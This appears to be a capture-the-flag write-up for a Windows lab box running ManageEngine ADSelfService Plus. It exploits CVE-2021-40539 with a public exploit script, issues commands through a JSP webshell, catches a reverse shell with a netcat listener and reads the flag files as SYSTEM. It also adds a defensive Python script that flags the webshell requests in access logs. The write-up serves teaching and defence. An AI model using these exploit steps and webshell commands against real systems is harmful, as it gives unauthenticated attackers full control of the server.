Myles Nieman

ADSelfService

Overview

ADSelfService is a very easy Windows box built around a known pre-auth RCE in ManageEngine ADSelfService Plus. The self-service portal is reachable on port 80 and is running a version vulnerable to CVE-2021-40539 — a REST API authentication bypass that chains into arbitrary file write and remote code execution. Exploitation drops a JSP webshell that runs under NT AUTHORITY\SYSTEM, so there is no privilege escalation step; both flags are readable immediately.

Path: ADSelfService Plus portal → CVE-2021-40539 webshell → NT AUTHORITY\SYSTEM → flags.

Enumeration

A port scan reveals a Windows host with a web service on port 80 as the only notable attack surface.

$ nmap -p- 10.129.227.78 -A

Nmap results showing port 80 open on the target

Browsing to port 80 reveals a ManageEngine ADSelfService Plus login portal branded with a 2021 ZOHO Corp. copyright.

ADSelfService Plus login portal on port 80

The version number visible on the page places this in the range affected by CVE-2021-40539.

ADSelfService Plus version information on the portal

Foothold — CVE-2021-40539

CVE-2021-40539 is a pre-authentication REST API bypass in ManageEngine ADSelfService Plus that allows an unauthenticated attacker to upload and execute arbitrary JSP files. The exploit from synacktiv/CVE-2021-40539 handles the full chain automatically:

$ git clone https://github.com/synacktiv/CVE-2021-40539.git
$ cd CVE-2021-40539
$ python3 exploit.py -t http://10.129.227.78/

The script confirms the target is vulnerable, writes two webshells, and reports the process context. The primary webshell (ws.jsp) proved unreliable, but the verification endpoint the script also places, test.jsp, is reachable and accepts a cmd parameter:

http://10.129.227.78/help/admin-guide/test.jsp?cmd=whoami

To get a proper reverse shell, a PowerShell reverse-shell payload was URL-encoded and sent in a POST to test.jsp, with a busybox listener on port 443 catching the callback:

$ sudo busybox nc -lp 443

Reverse shell caught, running as NT AUTHORITY\SYSTEM

The shell lands as NT AUTHORITY\SYSTEM with no further escalation needed.
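From the defender's side, the pattern above is easy to spot in web-server access logs: JSP files do not belong under the static /help/admin-guide/ documentation directory, and a request to one carrying a cmd parameter (or a POST to it) is a strong signal. The following Python triage script is an added example, not part of the original writeup or the exploit repository; the access-log lines are constructed sample data in common log format, not logs from the target.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format); not from the target.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /help/admin-guide/index.html HTTP/1.1" 200 5123
10.0.0.9 - - [12/Mar/2024:10:02:10 +0000] "GET /help/admin-guide/test.jsp?cmd=whoami HTTP/1.1" 200 87
10.0.0.9 - - [12/Mar/2024:10:02:30 +0000] "POST /help/admin-guide/test.jsp HTTP/1.1" 200 12
10.0.0.7 - - [12/Mar/2024:10:03:00 +0000] "GET /samlLogin/auth.jsp HTTP/1.1" 302 0
"""

# Minimal common-log-format parser: client, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The admin guide is static documentation; a .jsp served from here is unexpected.
DOC_PREFIX = "/help/admin-guide/"


def classify(line):
    """Return a finding dict for a suspicious access-log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    path = parts.path.lower()
    if not (path.startswith(DOC_PREFIX) and path.endswith(".jsp")):
        return None
    params = parse_qs(parts.query)
    # Rank the reason: explicit command parameter > POST body > bare JSP hit.
    if "cmd" in params:
        reason = "jsp under static docs dir with cmd parameter"
    elif m.group("method") == "POST":
        reason = "POST to jsp under static docs dir"
    else:
        reason = "jsp under static docs dir"
    return {"ip": m.group("ip"), "ts": m.group("ts"), "path": parts.path,
            "reason": reason, "cmd": params.get("cmd", [None])[0]}


def scan(log_text):
    """Run classify() over every line and keep only the findings."""
    return [f for f in (classify(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Pointing scan() at the real access log of the portal (or its reverse proxy) turns the writeup's own indicator, test.jsp?cmd=..., into a repeatable check.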

User and Root

Because the process already runs as SYSTEM, both flags are accessible directly from the webshell session:

SHELL> pwd

Path
----
C:\ManageEngine\ADSelfService Plus\bin

SHELL> whoami
nt authority\system

SHELL> type C:\Users\wooden_k\Desktop\user.txt
e6f5f0783e4a06910e2dac666165c4b1

SHELL> type C:\Users\Administrator\Desktop\root.txt
6e9f39e3f5e1e6be7007817e9a116cd3

Takeaways

  • CVE-2021-40539 turns an exposed ManageEngine ADSelfService Plus portal into an unauthenticated SYSTEM shell in a single script invocation — keep self-service portals off public interfaces and patched.
  • When the exploit’s primary webshell misbehaves, look for the verification endpoint the script also writes; it often accepts the same parameters and can be repurposed for a reverse shell.